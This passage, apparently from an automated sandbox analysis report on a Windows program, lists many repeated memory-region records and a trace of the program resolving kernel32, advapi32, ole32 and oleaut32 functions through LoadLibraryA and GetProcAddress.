entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 406 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 407 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 408 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 409 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 410 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 411 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 436 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 437 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 438 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 439 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 440 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 441 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 442 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 443 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 444 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 445 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 446 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 447 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 448 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 449 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 450 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 451 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 521 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 522 start_va = 0x1890000 end_va = 0x1c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001890000" filename = "" Region: id = 523 start_va = 0x1ca0000 end_va = 0x20affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 524 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 525 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 526 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 527 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 528 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 529 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 530 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 531 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 532 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 533 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 534 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 535 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 536 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 537 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 538 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 539 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 540 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 541 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 542 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 543 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 544 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 545 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 546 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 547 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 548 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 549 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 550 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 551 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 552 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 553 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 554 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 555 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 556 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 557 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 558 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 559 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 560 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 561 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 562 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 575 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 576 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 577 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 578 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 579 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 580 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 581 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 582 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 583 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 584 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 585 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 586 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 587 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 588 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 589 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 590 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 591 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 592 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 593 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 594 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 595 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Thread: id = 2 os_tid = 0xa8c [0090.849] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0090.849] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0090.850] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0090.851] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0090.852] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0090.853] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0090.854] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0090.854] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0090.854] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0090.855] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0090.856] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryA") returned 0x7696395c [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="TlsSetValue") returned 0x7695da88 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="TlsGetValue") returned 0x7695da70 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0090.856] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0090.856] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0090.856] GetProcAddress (hModule=0x769f0000, lpProcName="OpenThreadToken") returned 0x76a0432c [0090.856] GetProcAddress (hModule=0x769f0000, lpProcName="OpenProcessToken") returned 0x76a04304 [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="GetUserNameA") returned 0x76a1a4b4 [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="GetTokenInformation") returned 0x76a0431c [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthorityCount") returned 0x76a00e0c [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="GetSidSubAuthority") returned 0x76a00e24 [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="FreeSid") returned 0x76a0412e [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="EqualSid") returned 0x76a0410b [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="AllocateAndInitializeSid") returned 0x76a040e6 [0090.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="RegQueryValueExW") returned 0x76a046ad [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="RegOpenKeyExW") returned 0x76a0468d [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="RegCloseKey") returned 0x76a0469d [0090.857] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x769f0000 [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0090.857] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0090.857] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0090.857] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0090.857] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0090.857] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0090.858] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0090.858] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 